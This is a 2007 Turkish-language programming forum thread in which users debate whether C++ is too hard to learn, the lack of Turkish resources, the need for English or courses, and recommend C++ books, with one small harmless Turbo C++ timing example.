PDA

Tam Sürümünü Görmek İçin : C++ öğrenilecek gibi değil

Sayfa : [1] 2

onur2200
03/03/2007, 16:35
Nihayet C++ buldum ve yükledim ama baktım ki Türkiye de c++ dersi verebilecek yani tüm programlama bilgisine verebilecek bir site yok , yani görsel bir eğitim seti ve ya kurs eğitimi almak şart...Bu yüzden programlama yapmak isteyen arkadaşlara diğer dilleri öneririm mesela PHP ve programcılık için Visual Baisc...Bunlar öğrenmesi çok zor olmayan diller , bu düşüncenin aksini düşünen arkadaşlar da olacaktır tabi ki , ama ben bunun pek yanlış olduğunu sanmıyorum...Programı çalıştırdığımda yok derlenmedi bilmemne hatalar çıkıyo , çalıştığında MS-DOS ekranı çıkıyo , tuhaf tuhaf bir sürü şey...Belki çok gelişmiş bir dildir ama bu kadar zor olmasının sebebi nedir anlamadım...

ubuntu
03/03/2007, 16:44
Evet kaynak eksikliğini bende çekiyorum bir türlü adım atamıyorum c++ a. Biraz php bilgim var mecburen php ile devam edeceğim. İngilizce olmadan bu c++ ı ben öğrenemeyeceğime karar verdim. Belki çabuk pes ettim ama elimden bu kadar geliyor.

onur2200
03/03/2007, 16:54
şu da var;
bu kadar gündemde olmasının nedenini ben çözemedim...Çok gelişmiş olduğundan şüphem yok , ama hiç te kolay değil...

C++ bilen o kadar vatandaşımız var (tamamını bilen) , ama türkiye de c++ derslerini tam olarak verebilen kaynak bir site yok , her sitede farklı şeyler var , C++ nin bir bölümü başka , diğer bölümleri başka sitede...Hangisiyle başlayacağımız şaşırdık walla...

C++ birgün öğrenirsem , çok detaylı , hiçbirşeyi aratmayacak bir site kurmayı düşünüyorum , hatta şimdiden böyle bir site kurmak isteyen arkadaşlarımız varsa birlik olup yapabiliriz...

Yazık walla billa , kendi ülkemizin vatandaşı öğrenmesinde kim öğrensin yaa...
Birşeyler anlasam ordan burdan bulduğum dersleri düzene sokar kendim de yaparım ama yok işte.

Visual basic derleri ile ilgili tonlarca site var , bunlardan öğrendim zaten bende ama diğer diller = nothing

ubuntu
03/03/2007, 17:05
Zor olması daha iyi aslında. Basit olsaydı herkes öğrenirdi ve hiç bir önemi kalmazdı. Herkesin yapabildiği şeyden para kazanmak biraz zor olmazmı? Benim sıkıntım zor olması değilde kaynak olmaması. Kaynak olsaydı bir şekilde ağır ağır öğrenilebilirdi.

Meteryus
03/03/2007, 17:27
Bir dil öğrenmeye karar verdiğinizde kararınızı etkileyecek en önemsiz kriter zor yada kolay olmasıdır, nitekim programlama zaten zor ve sıkıcı bir konudur , zor olmayan bir iş yapmak istiyorsanız başka bir alanda yeteneklerinizi geliştirmeye çalışabilirsiniz, bir dilin diğer bir dile göre daha basit olması o dilin diğerinden daha zayıf olduğundan başka bir anlama gelmez. Ayrıca hangi dilin daha basit yada hangisinin daha karmaşık olduğu göreceli bir kavramdır, size basit gelen şey başka birine karışık gelebilir, yada sizin kolaylıkla anladığınız bir şeyi başka biri anlayamayabilir vs.

onur2200
03/03/2007, 17:38
Visual basic ile programlama yapabiliyorum , ama c++ öğrenemediğim için ve tasarımlarımın kısıtlı olması beni çok üzüyor...Bu yüzden birşeyler yapmak istedim ama dediğim gibi... Artık 19-20 yaşlarında öğrenirim , şimdilik bu kadarı yeter sanırım...

Ama meraklı olmadığım söylenemez , bir yerlerde c++ kodları görüyorum ve öğrenmek için içim kaynıyor...Elime alıyorum c++ ı ama tık yok , diğer öğrendiğim programlar beni böyle hayal kırıklığına uğratmazdı , çünkü her an birşeyler öğreniyordum...

ubuntu
03/03/2007, 17:38
Evet meteryus sana katılıyorum. Bizim sıkıntımız aslında kaynak sorunu. Kaynak olmadığı için daha da zorlaşıyor öğrenmek. Kaynak var ama döküman olarak. Bizim aradığımız ayrıntılı ve sıfırdan anlatım yapan kitap gibi birşey. Tabi bunun e-kitap olanı ve de türkçe olanı :D

ntxsoft
03/03/2007, 20:34
kaynak eksikliği diyorsunuz. birçok dilde kaynak bulabilirsiniz. türkçesi fazla yok. zaten programlama ve özellikle c++ gibi diller öğrenmek istiyorsanız gidin önce ingilizce öğrenin. bu işin dili ingilizcedir çünkü.

ubuntu
03/03/2007, 21:17
İngilizce öğrenmeden bu işi yapamıyacaksam hiç öğrenmim. C++ gibi zor bir dili öğrenmek zaten uzun zaman alır. Bir de ingilizce öğrenirsem 10 yıl sürer.

masterbg
03/03/2007, 23:55
İngilizce öğrenmeden bu işi yapamıyacaksam hiç öğrenmim. C++ gibi zor bir dili öğrenmek zaten uzun zaman alır. Bir de ingilizce öğrenirsem 10 yıl sürer.
ingilizce kadar kolay dil varmi ?
bende basladim elimde gorsel bir set var cook basitr bence yani biraz azim gerekiyor

onur2200
03/03/2007, 23:57
c++ gibi diller öğrenmek istiyorsanız gidin önce ingilizce öğrenin.

Zaten ingilizce biliyorum , ama nedense c++ yı öğrenmek için yeterli olmuyor, ben ingilizce kuralına göre c++ kullansam program kesin çöker...

Bence sadece ingilizce yeterli değil , c++ ile ilgili hiç bir şey bilmedikten sonra yemişim ingilizcesini...

yani:
English is not enough!!!

ubuntu
04/03/2007, 12:16
Yani ingilizcem yok ise c++ öğrenemeyeceğim öylemi ? :garip:

onur2200
04/03/2007, 13:03
yok ya alakası yok , ben biliyorum da ne oluyo , kaynak yok yine öğrenemiyoruz...

ingilizceyle hiçbir alakası yok , olsa daha kolay öğreneceğin bir ihtimal ama olmadan da öğrenebilirsin...

PlayG7SeveN
04/03/2007, 14:34
ilk önce ön yargılı davranmayın... c++ bilmek için inglizceye gerekmez... ve internette tutorial bulamıyorum diyosunuz.. binlerce türkçe tutoriallar var... daha önceden bu foruma vermiştim...http://www.mutasyon.net/dersler.asp sanırım hiç araştırıp bakmamışsın...
ve kitapta önerdim...buda 2.ci türkçe bi kaynak..biraz paranı saklayıp kitap alsan hiç fena olmaz... ve ben bu sayede 2 3 ayda kendimi çok geliştirdim...vee artı ceviz.net forumları var ....

PlayG7SeveN
04/03/2007, 14:41
http://forum.ceviz.net/c-nerden-ogrenebilirim-t38819.html

ve bu açtığın konuyuda unutmamanı tavsiye ederim...içinde herşey yer alıyor

onur2200
04/03/2007, 14:51
neyse , her şeye rağmen bir kez daha denemekte fayda var...

erpay
04/03/2007, 15:00
Yani ingilizcem yok ise c++ öğrenemeyeceğim öylemi ? :garip:

Öğrenirsin de cidden öenmli bir çaba sarfetmen lazım bu c++ olsun ya da başka birşey olsun en iyi kaynaklar hep ingilizce :(

onur2200
04/03/2007, 16:07
Zaten türklerin c++ ile ilgili kaynak ve paylaşım sitesi yapması , avrupa birliğine girmesinden daha zor gözüküyor...Yine belki birkaç yerde güzel kaynaklar var ama sadece c++ üzerine türkçe bir kaynak bulamıyoruz...Öğrendiğim zaman grup arkadaşlarımla yapacağız biz bir iki yıla kadar , arık herkes c++ de yaptıklarını paylaşabilecek...

Ad3m
05/03/2007, 06:04
Zaten türklerin c++ ile ilgili kaynak ve paylaşım sitesi yapması , avrupa birliğine girmesinden daha zor gözüküyor...Yine belki birkaç yerde güzel kaynaklar var ama sadece c++ üzerine türkçe bir kaynak bulamıyoruz...Öğrendiğim zaman grup arkadaşlarımla yapacağız biz bir iki yıla kadar , arık herkes c++ de yaptıklarını paylaşabilecek...

Bahs ettiğin zamana gelmek "guru" olmak için söylediğinden çok daha fazla zamana ihtiyacın var.
-Dili öğrenmek.
-Uygulama geliştirmek.
-Belli bir birikime varmak.
-Bilgini anlaşılır bir seviyede yazmak (En zor kısmıdır sanırım)
-Bütün işlerinden sıyrılıp bunu yayınlamak ve sürekli güncel tutmak (Ticari kısmı olurmu bilemem tabi)
Aslında bu maddeler çok genel.Düşüncen güzel ve tetikleyici olabilir ama zaman içinde yok olacağından korkarım.

izon
05/03/2007, 06:56
@ad3m arkada$ "guru" değil "grup" demi$ yalniz :)

her neyse, arkada$im pes etmeyeceksin öncellikle. unutma "kimse ba$arinin merdivenlerini, elleri cebinde çıkmadı" her $eyi süper biliyorum $u bu felan değilim yanlı$ anlama zaten sürekli teknolojiye ayak uydurmaya çalı$ıyoruz :)

Ama buradaki tüm coder arkada$larimida sorabilirsin. Herkes kendi projesini yazarkende kafayı yiyecek raddeye gelip pc ba$inda uyuyakalmi$tir. Yani dili bilirken bu kadar zorlaniyorsan ( bedenen ve zihinsel ) öğrenirkende bir çaba harcayacaksın elbette. Pek edebiyat yapmak istemiyorum sana ama türkçe kaynak var, kitaplar var, video tutoriallar(ingilizce olabilir ama kalkıp sana fransız ihtilalini anlatmıyor :) ) var bunların hepsinin sentezini yaptığında ve verilmi$ olan mutasyon linkiniide okuduğunda yapamayacağın bir $ey olduğunu sanmıyorum. Ama "anlamadım ya at gitsin" diyip geçmemen gerekiyor. Sonuçta hepimiz bir $eyleri öğrendiysek emek verdik, zaman harcadık. Kimsenin "armut pi$ ağzıma dü$" felsefesi yaptığını sanmıyorum. İkincisi ingilizce bence de $art sadece dili anlamak için değil bir yerde takılırsın googledan bakarsın ingilizce çook daha rahat bulursun ( yani almanlarrında ingilizce soru sorduklarına eminim ) üçüncüsü bölümlerinizi, ne okuduğunuzu bilmiyorum ama matematik ve matematiksel dü$ünce ile biraz daha sıkı fıkı olun. Bu da kod yazarken emin olun ki analiz ve pratik dü$üncenizi ortaya çıkartacaktır. Düz mantık kod yazmayacaksınız.

Hepinize sonsuz sevgiler

mesutbarlas
05/03/2007, 10:21
Sizin sıkıntınız kaynak sorunu değil sizin sıkıntınız hazır kodlar bulamamanız. Bir programlama diline hakim olan bir şahıs çok rahat bir şekilde diğer dillere de hakim olabilir. Derleyici yapısı ve birkaç fonksyonunu bildikten sonra tekrar diyorum bir programlama dilini biliyorsanız diğer dillerde de çalışabilirsiniz. Herhangi bir mantık değişimi yoktur Tüm programlama dillerinde mantık aynıdır pascalda integer dir C de int dir bu günü değişiklikler ...

Hazırlop a konacağınıza kurslara gitmeyi deneyin. C , C++ Döküman ile öğrenilebilecek bir dil değil.

C++,C dilini tamamen biliyorum ben C de uzmanım diyen bir şahıs yalan söylüyordur. C Ucu bucağı olmayan bir dildir.

Programcılık öyle oradan gözüktüğü gibi basit birşey değildir. Basit olsaydı bugün herkez program yazıyor olurdu. Windows'u iyi bilmeden programcı olamazsınız, Olay mantıklarını irdelemeden bir yerlere gelemezsiniz.

Tavsiyem Mutlaka bir programlama dili kursuna gitmeniz.
Herşey kursla da bitmiyor kurslarda size sadece temel bilgileri ve olayın mantığını anlatırlar. Temel bilgileri hiçbir forumda veya hiçbir kaynak sitesinde bulamazsınız . Bu konular kaynaklarla irdelenecek konular değil. Olay mantıklarını kavradıktan sonra yani en az bir programlama diline hakim olduğunuz sürece her alanda programlama yapmanız mümkün olacaktır.

mesutbarlas
05/03/2007, 10:25
Ha aklıma gelmişti onu da yazayım . Diyorsunuz ya türklerin kaynak sitesi , yardım sitesi yok diye..
Hiçbir yabancı forumda şöyle bir başlık göremezsiniz.
"Ben şurdan şunu yapan burdan buraya tıklayan sonra bilmemne yapan program istiyorum?"

İşte hazırlopçu bir milletiz, olayların mantığını kavrayacağımıza en kısa yoldan nasıl kaynak bulurumun derdindeyiz..
Yabancıların tek yaptıkları şey olayların mantığını kavramak
Kullanacağınız bileşenin iç yapısını kavramak Bknz yabancılar bu konulara destek veriyorlar...

Kolay gelsin

mesutbarlas
05/03/2007, 10:28
ingilizce kadar kolay dil varmi ?
bende basladim elimde gorsel bir set var cook basitr bence yani biraz azim gerekiyor

Basit olan nedir arkadaşım ? C de ekrana merhaba dünya yazdırmak mı ?
printf("Merhaba dünya"); yazdırmak mı ?

Bumudur basit olan ? Siz neye basit diyorsunuz arkadaşlar lütfen yapmayın herşeyin bir hak ettiği bir durum var..

borsaci_b
05/03/2007, 10:59
İngilizce gerçekten çok basit bir dil. 6 ay içinde öğrenmiştim. 5 yıldır hiç çalışmıyorum ama hala cnn dinlediğimde bana yetecek kadar anlıyorum. İngliizce hazırlığı bıraktığımda 98 ortalamam vardı. Hakkını vermek lazım biraz kelime ezberlersen ve inglizce filmleri inglizce altyazıyla izlersen çok hızlı ilerlio. .. ... ....

eezgu
05/03/2007, 11:02
Basit olan nedir arkadaşım ? C de ekrana merhaba dünya yazdırmak mı ?
printf("Merhaba dünya"); yazdırmak mı ?

Bumudur basit olan ? Siz neye basit diyorsunuz arkadaşlar lütfen yapmayın herşeyin bir hak ettiği bir durum var..

arkadaş C den değil de ingilizceden bahsetmiş sanırım. ama bilmeyen ve daha önce hiç başlamamış birisi için ingilizce öğrenmek de zordur.

Euclides
05/03/2007, 11:06
C++,C dilini tamamen biliyorum ben C de uzmanım diyen bir şahıs yalan söylüyordur. C Ucu bucağı olmayan bir dildir.
C sadece 20-25 keyword'den ibaret bir dildir. Sizde abartığınızı düşünmüyormusunuz ?

Ansugo
05/03/2007, 12:05
Programı çalıştırdığımda yok derlenmedi bilmemne hatalar çıkıyo , çalıştığında MS-DOS ekranı çıkıyo , tuhaf tuhaf bir sürü şey...Belki çok gelişmiş bir dildir ama bu kadar zor olmasının sebebi nedir anlamadım...

Dil olcme kriterlerin cok hos. "Hatalar cikiyo, dos ekrani cikiyo, tuhafliklar oluyo" :)

Ormanda aslanlar tarafindan buyutulmus bir tarzan sehre indiginde arabalari gorse baya tuhafina gider. Bu da aynen onun gibi birsey.

Zamana icinde deneyim kazandikca hatalar cikmamaya, dos ekranlari bir gorunup bir kaybolmamaya ve tuhafliklar yokolmaya baslar. O zamanda isin zevki kaciyor, tuhafliklar ve gariplikler olmadigi icin eglenemiyorsunuz.

onur2200
05/03/2007, 18:52
Sizin sıkıntınız kaynak sorunu değil sizin sıkıntınız hazır kodlar bulamamanız.

Nasıl bu kadar emin olabiliyorsunuz?

mesutbarlas arkadaşım türklerin çok hazırlopçu bir millet olduğunu söylüyorsunuz , iyi hoş ta ülkenin durumunu da göz önünden geçirmeniz gerekiyor.

Yani şu anlamda; türkiye çok fazla gelişmiş bir ülke değil , üstelik biz şunu şöyle yapan bir program istiyorum kesinlikle demedim , sanırım genel konuştunuz...Ben de olayın mantığını öğenme peşindeyim ama öyle de bir kaynak yok , kursa gitmemiz gerektiğini söylüyosunuz ama eğer istediğimiz gibi bir kaynak olsaydı , kursa gerek kalmazdı...Kaynaklardan birçok güzel programlar yapanlar da var...

acehreli
05/03/2007, 20:23
Ben Turkce kaynak olmadigi konusuna katilmiyorum. Olsa olsa cevirilerinin akici olmadiginda anlasabiliriz.

Ben de 3-4 sene once Ersin Er'le birlikte bir kitap yazmaya yeltenmis ama vazgecmistim. Isin uzunlugu ve zorlugu yaninda, bir suru *super* Ingilizce kaynagin Turkcelestirilme olasiligi da etken olmustu. Gercekten de artik cok sayida *super* kaynak Turkce.

C++, ogrenmesi cok emek ve zaman gerektiren bir dildir. Dili tanitan hicbir kitap hicbir sey yapmaya yetmez. Onun ustune bir suru baska kitap da okumak gerekir; o kitaplar nerelerde ne tuzaklar var, neyi nasil yapmak daha iyidir gibi konularla doludur.

[Not: Dogrusu; o kadar kitabi okumus birisi olarak, bazi konularin gereksiz yere fazla irdelendigini dusunuyorum. Bazi konularin ustunde sayfalarca durulur, ondan sonra uygulamada hayatta karsilasmazsiniz.]

[Not: Herkes farkli tabii... Ben C++'i uzun surede ogrendim diye baskalari da oyle olmak zorunda degil. Yine de, C++'in uzun zaman aldigi cok yaygin bir kanidir.]

Ben Ingilizcesi olmayan sabirli birisi olsam, su kitaplari cok emek vererek su sirada okurdum:

--------------------------------------
1) Herhangi bir Turkce C kitabi.

Not: C++'a baslamadan once C ogrenilmesi gerekmedigi konusunda bir gorus de var; ama Turkce kaynaklarin kisitli oldugu bu durumda o dusunceyi bir kenara birakabiliriz herhalde.

Not: Bu kitaptan bazi yanlis bilgi de edinebilirsiniz ama genel amaca goturecegi icin o kadar onemli degildir.

2) Herbert Schildt'in "C++ Temel Ogrenim Kilavuzu"

http://www.ideefixe.com/kitap/tanim.asp?sid=PUCTH4WXHT5T3EE0L7KM

Not: Bu kitap da en iyi C++ kitabi degildir. Ben bir suredir Turkce kitaplardan habersizim; belki daha iyi kitaplar da Turkcelestirilmistir.

3) Herb Sutter'in "Sira Disi C++" kitaplari. (Iki cilt olmasi lazim.)

Not: Aslinda ben olsam bunlardan once Scott Meyers'in "Effective C++" kitaplarini okurdum ama Turkcelestirildiklerinden haberim yok.

4) Stephan C. Dewhurst'un (veye Stephen, veya Steve; emin degilim) "99 Tuzak ve Cozumleri".

Not: Bu kitap da cok gerekli degildir ama yine de cok yararli olacaktir.

5) Onumuzdeki yillarda cevrilmesi olasi olan ve Addison Wesley tarafindan basilan hemen hemen butun C++ kitaplari. O basim evi C++'in butun ustalarini kapmis durumda. :) Addison Wesley'in butun C++ kitaplarini gozu kapali alabilirsiniz.
--------------------------------------

Yukaridaki listenin ilk iki maddesi yerine, daha iyisi, ama eger Turkcelestirildilerse, su kitaplardan yararlanmaktir:

a) Francis Glassborow'un hic programlama kavrami bilinmiyorsa "You Can Do It!" kitabi, eger programlama biliniyorsa "You Can Program In C++" kitabi.

b) Andrew Koenig ve Barbara Moo'nun "Accelerated C++" kitaplari

Bunlari sabirla calisarak okurken, takildiginiz yerleri ceviz gibi *Turkce* forumlarda sorarsaniz C++'i gayet iyi ogrenirsiniz. Ama eger C++'in php ogrenir gibi ogrenilen bir dil oldugunu saniyorsaniz, once bu kaninizi degistirmeniz gerekiyor.

Ali

Not: Iyi ve Turkce C++ kaynagi olmadigi yanilgisini boylece ortadan kaldirdigim icin mutluyum. :)

quasimodo
05/03/2007, 20:54
Hazırlop a konacağınıza kurslara gitmeyi deneyin. C , C++ Döküman ile öğrenilebilecek bir dil değil.
Kesinlikle katılmadığımı belirtmek istiyorum ....

acehreli
05/03/2007, 21:09
Kursa gitme geregine ben de katilmiyorum. Ben kursa gitmedigim gibi, bilgisayar bolumune de gitmedim. Sunlari yaptim:

1) accu.org'un kitap elestirilerindeki en iyi kitaplari okudum. (Ingilizce bilmeyenler bu konuda sanssiz durumdalar.)

2) comp.lang.c++.moderated grubunu izledim. (Ingilizce bilmeyenler ceviz gibi forumlarla yetinmek zorundalar. Yetinmek diyorum cunku Bjarne Stroustrup, Herb Sutter, vs. ustalar buraya gelemiyorlar :) )

3) Calistigim isler ogrendiklerimi uygulayabilecegim ortamlar sagladilar. Ornegin C dizileri yerine std::vector kullanmaya basladim. (C ve C++ karisik basladi; su anda tamamen C++...)

Ali

ubuntu
05/03/2007, 22:30
acehreli sorum biraz özel olacak cevap vermesende olur (inş verirsin :) ) Bu c++ tan aylık ortalama ne kadar gelir elde ediyorsun? Eğer güzel bir geliri varsa ingilizce olmadan sabırla öğrenmeye değer. Ama geliri pek yoksa öğrenmeye değmez sanırım. (bence)
Tabiki yaşanılan şehir, o şehrin bilişim üzerine olan yoğunluğu ilgisi, yapabileceğin işler falan filana göre değişir bu gelir ama yinede bir miktar söylersen gerçekten çok merak ettiğim şeylerden birini öğrenmiş olurum. Kendi kazancını söylemek istemezsen ortalama kazanılabilecek birşeyler söylersin umarım :)

onur2200
05/03/2007, 22:40
öncelikle acehreli arkadaşımdan özür diliyorum çünkü soru ona sorulmuştu ama ubuntu arkadaşım ortalama gelir konusunu ele aldığı için cevap vermek istiyorum...

bu işten bir kaç türlü para kazanabilirsin ;

-Bir firmada/şirkette/kuruluşta çalışarak kazanabilirsin

-C++ kullanarak yaptığın programları satarak kazanabilirsin

-C++ öğretmenliği yapabilirsin

-C++ ile yaptığın programları satabilirsin

-bunlardan tümünü ve ya bir kaçını yapabilirsin

Kazancın yapacağın işe göre değişir ama (çevremdeki c++ kullanıcılarından bildiğim kadarıyla) bu işi iyi yaparsan , aylık gelirin 1000 - 3000 ytl arasında değişir sanırım tabi bu işin kalitesine göre azalıp artabilir ama ortalama gelir bu kadar olduğunu sanıyorum...

onur2200
05/03/2007, 22:42
-C++ ile yaptığın programları satabilirsin

2. sini , yaptığın program projelerini satabilirsin anlamında yazdım (Herhangi bir siteye ve ya kuruluşa)

ubuntu
05/03/2007, 22:45
onur2200 cevabın için teşekkür ederim. 1000 - 3000 ytl ortalama demişsin. Ben bu parayla "yaşadığım şehirde" 2 aile bakarım rahat :) Ama işin kötü tarafı yaşadığım şehir küçük ve bu işten pek kazanılacağını sanmıyorum. Çünkü ne şirket var ne de asgari ücretten fazla verecek bilgisayarcı. :aglama:

Not: Yaşadığım şehir trabzon.

acehreli
06/03/2007, 01:02
Ben "Silikon Vadisi"nde calistigim icin Turkiye'deki durumu bilmiyorum. Ben yasamimi 1997'den beri C++ kullanarak kazaniyorum. Hatta cok ayip bir sekilde baska dil de bilmiyorum. :) (Aslinda meraktan tam su siralarda Objective C'ye bir bakmaya basladim.)

Ali

mesutbarlas
06/03/2007, 01:55
C sadece 20-25 keyword'den ibaret bir dildir. Sizde abartığınızı düşünmüyormusunuz ?
:)

Linux c dilinde yazılmıştır 25 komutlamı yazılmış :) Yapmayın allah aşkına bilmiyorsanız yorum yapmayın.. Assembler le karıştırdın sanırım :)

mesutbarlas
06/03/2007, 02:04
Kaynak yok demişsiniz o kadar çok kaynak var ki tabi anlayamazsınız neden anlamakta zorluk çektiğiniz söyleyeyim kodun altında yatan mantığı bilmiyorsunuz..

C Kurs veya sözlü anlatım harici öğrenilebilir diyorsunuz.. Soruyorum kurs olmadan öğrendiğini iddia eden arkadaşlara ney öğrendiniz ? For döngüsü , while döngüsü kurmayı mı ?

Yoksa sınıfları mı yoksa pointerleri mi :)..

2. bir sorum bu kursla öğrenmediklerini iddia eden arkadaşlara. Ney öğrendin arkadaşım ekrana 1 den 10 a kadar merhaba yazdırmayı mı ?

bunları c den anlayan yıllarını bu dile harcamış insanların karşısında söylemeyin yüzünüze gülerler...

Temel bir programlama bilgisine sahip olmadan yok ordan baktım şurdan çaldım şurdan kırptım ve öğrendim demekle kendinizi kandırırsınız..

Buyrun kendinizi kandırdığınızın ifadesi..

#include <conio.h>
#include <iostream.h>
#include <dos.h>
class hayat
{
private:
struct time t;
int gec,gec2,saat1,dakika1,saniye1,salise1,saat2,dakik a2,saniye2,salise2,top,top2;
public:
hayat()
{
gettime(&t);
saat1=t.ti_hour;
dakika1=t.ti_min;
saniye1=t.ti_sec;
salise1=t.ti_hund;
}
~hayat()
{
gettime(&t);
saat2=t.ti_hour;
dakika2=t.ti_min;
saniye2=t.ti_sec;
salise2=t.ti_hund;
top=salise2-salise1;
gec2=salise2;
if (top<0)
{
gec2=100-saniye2;
//top=top*(-1);
gec=saniye2-1;
cout<<saat1<<" "<<dakika1<<" "<<saniye1<<" "<<salise1<<" "<<endl;
cout<<saat2<<" "<<dakika2<<" "<<saniye2<<" "<<salise2<<" "<<endl;
cout<<"™MšR="<<saat2-saat1<<" saat "<<dakika2-dakika1<<" dakika "<<gec-saniye1<<" saniye "<<100-((-1)*top)<<" salise";
}
else
{
gec=saniye2;
cout<<saat1<<" "<<dakika1<<" "<<saniye1<<" "<<salise1<<" "<<endl;
cout<<saat2<<" "<<dakika2<<" "<<saniye2<<" "<<salise2<<" "<<endl;
cout<<"™MšR="<<saat2-saat1<<" saat "<<dakika2-dakika1<<" dakika "<<gec-saniye1<<" saniye "<<top<<" salise";
}
getch();
}
};
void main()
{
clrscr();
hayat n1;
getch();
}

Hayat diye bir class yaratılmış ~hayat da nerden çıkmış ~hayat nedir ?

Tekrar hatırlatmak istiyorum C ucu bucağı bulunmayan bir dildir. Ve tekrar diyorum ki C de oturup güzel bir proje yapabilmek için C harici bir programlama dili bilgisine sahip olmanız duırumunda güzel bir proje ortaya çıkartabilmeniz için en az 1 yıl C öğrenmeniz gerekmektedir ..

Şayet programlama öğrenmeye C dilinden başladıysanız bu 2 yılı aşkın süreçleri bulacaktır..

Sözlerim kimseye ağır gelmesin siz programlama dilllerini hafife alıyor çocuk oyuncağı sanıyorsunuz. "Siz" den kastım C veya başka bir dilin bu derece basit gösteren insanlardır.

Sabahi
06/03/2007, 03:57
Euclides, mesajından alıntı:

Linux c dilinde yazılmıştır 25 komutlamı yazılmış Yapmayın allah aşkına bilmiyorsanız yorum yapmayın.. Assembler le karıştırdın sanırım

@mesutbarlas, dikkat ettiyseniz Euclides komut demiyor keyword diyor. Asagidaki linke bir goz atarsaniz standard ANSI C nin 30 civarinda keyword icerdigini ve bunlarin bir listesini bulabilirsiniz.

http://tigcc.ticalc.org/doc/keywords.html

Bence karsimizdakini bilgisizlikle suclamadan once ne dedigini anlamaya calisirsak yani gunumuzun moda deyimi ile empatik dinleyici olursak daha iyi anlasiriz.

mesutbarlas
06/03/2007, 10:13
komuttan kastım keyword zaten bu sitede vermiş olduklarınız sadece temel , en yaygın kullanılan keywordler şimdi siz bana kaynak göstereceğinize bi açın turbo c veya turbo c++ veya bir c compiler ve help dosyasını inceleyin bakın bakalım bu kadar mı varmış..

Konuyu farklı mecralara çekmeyin bu kadar basit olduğunu düşünenleredir lafım programcılığı böylesi komik hemde c gibi bir dil için yapılan yorum beni üzüyor açıkcası..

++ Bir for döngüsü bimek bir if yapısı bilmek programcıyım demek veyahut ben c dilini biliyorum demek anlamına gelmez..

İşin temelini öğrenmeden ben biliyorum diye iddia edenlerin yapabileceği projeler bulursunuz bi yerden source kırpar kesersiniz XX Kodu bilmemnereyi boyamaya yarıyomuş , YY Kodu şunu bunu yap.. Herhangi bir logic problem ile karşılaşıldığında problemin neyden kaynaknaldığı bilinemez..

Şimdi bi C kütüpanelerini açın bakın 10 binlerce fonksyon ile karşılaşacaksınız , sırf bunların hepsini öğrenebilmek bile yıllar alacaktır. Akıl var mantık var gerçekçi olun ve gerçekleri görün. Burası Ego tatmin etme yeri değil kanaatimce ha tabiki bu size kalmış HAYIR KARDEŞİM BEN BİLİYORUM C++ X ayda öğrendim diyen e bu vakitten sonra lafım olmaz.. Bu şahıslar kanımca yalan söylüyor egolarını tatmin ediyordur (Şahsi görüşümdür). Bu işe yıllarımı adamış bir insan olarak ben halen kendim için C dilini orta derecede bildiğimi iddia ederim sebebi ise C nin ucu bucağı olmadığıdır.. Kolay gelsin

onur2200
06/03/2007, 11:27
siz programlama dilllerini hafife alıyor çocuk oyuncağı sanıyorsunuz.

Ama mesutbarlas , kolay olduğunu düşündüğümü nerden çıkarttın? yani ben bir dilin ne kadar zor olduğunu çok iyi bilirim hatta sizde daha iyi bilirim çünkü hiç bir şey bilmiyorum (bildiğim sadece visual basic ve asp) , c++ öğrenmek çok istiyorum ve kolay olmadığını biliyorum , yabancı siteler biraz ayrıntılı bilgi veriyor ama yeterli değil , ben kursa gitmeye karar verdim...

Artık kaynaklardan da kendimi geliştirmek için yardım alırım...

Kesinlikle reklam olarak düşünmeyin , ben hangi kursa gideceğimi bilmiyorum, yardımcı olur musunuz? C++ nin tüm temelini mantığını anlayabileceğim bir kurs...

Bir kaç tane söylerseniz sevinirim...

Ansugo
06/03/2007, 11:34
ben halen kendim için C dilini orta derecede bildiğimi iddia ederim sebebi ise C nin ucu bucağı olmadığıdır..

Bir dili bilmek demek her fonksiyonunu, her kitapligini bilmek demek anlamina gelmez. Zaten boyle birseyi bilmek insanustu birsey oldugunuzu gosterir ki oyle birsey yok.

Bir dilin sintaxini, yapisini, isleyisini, kullanimi ve (genelde 20-25 tane olan) temel fonksiyonlarini ya da isleclerini ogrendikten sonra kisiye o dili biliyor gozuyle bakilir.

Dil bilmekle deneyim ise farkli seyler. Hani "dili biliyorum deyin ama deneyimliyim demeyin" derseniz bunu anlarim. Ama adam temeli aldiktan sonra benim gozumde dili biliyor demektir. Her fonksiyonu ogrensin, her kitapligi bilsin diye insanustu cabalar istemem. Lazim oldu mu acar bakar, gelir forumlara sorar daha once o sorunu cozmus kisilerden tavsiyeler alir.

Kaliplarinizi degistirin bence. Kimse programlama kolay filan demiyor ama herkesin de herseyi bilmesi gerekmiyor. Bosa cabalamaya gerek yok.

Ansugo
06/03/2007, 11:38
C Kurs veya sözlü anlatım harici öğrenilebilir diyorsunuz.. Soruyorum kurs olmadan öğrendiğini iddia eden arkadaşlara ney öğrendiniz ? For döngüsü , while döngüsü kurmayı mı ?

Kaldi ki bu da yanlis bir dusunce. Ben hayatimda bir kere kursa gittim 95 senesinde. Onun haricinde ogrendigim neredeyse hersey yabanci kaynaklari okumaktan geliyor.

Kursa gidenlerin avantaji su. Deneyimi kisa surede alabiliyorlar. Kursa gitmezseniz deneyimi uzun zaman icinde deneyerek kazanmak zorundasiniz.

Onun haricinde kursa git gitme ne farkediyor?

mesutbarlas
06/03/2007, 12:48
Sözlü anlatımın veyahut kursun faydası şudur ki işin temel mantığını öğreniyorsunuz Hocalarınız sizlere neyin neden kullanıldığını veya neyin ne durumlarda kullanılması gerektiğini belirtir. Programcı mantığına sahip olmanızı sağlar ve sadece temel düzeyde bir seviyeye sahip olursunuz daha fazlasını vermezer. Bu durumdan sonra şahıs kendini çok rahat geliştirebilecek , baktığı bir kodda ne yapıldığını anlayabilecek , İleride bir proje ile çalışırken logical bir problem ile karşılaştığında problemin nerden geldiğini ve nelerin sebebiyet verdiğini anlayabilecektir..

Ben kimseye c kütüphanelerini ezberleyin fonksyonlarını ezberleyin bu şart gibilerinden bir kelamda bulunmadım sadece c nin 25 keywordden oluştuğunu iddia edenlere cevabımdır bu..

Eğer ciddi anlamda ciddi projeler ile uğraşacak projeler hazırlamayı düşünüyorsanız 1. Olarak bilinmesi gereken Dilin windows ile etkileşimini öğrenmek ve kullanacağımızı yapı ağacını irdelemek olmalıdır. Misal Soket programlama ile uğraşıyorsanız ilk önce soketin ne olduğunu bileceksiniz RFC Yapısını inceleyeceksiniz tcp / ip yapısını inceleyeceksiniz sum ve header leri bileceksiniz .. Şayet bunları bilmiyorsanız öyle bir yerde takılırsınız öyle bir kritik hata alabilirsiniz ki projeyi yarım bırakmak zorunda kalabilirsiniz ..

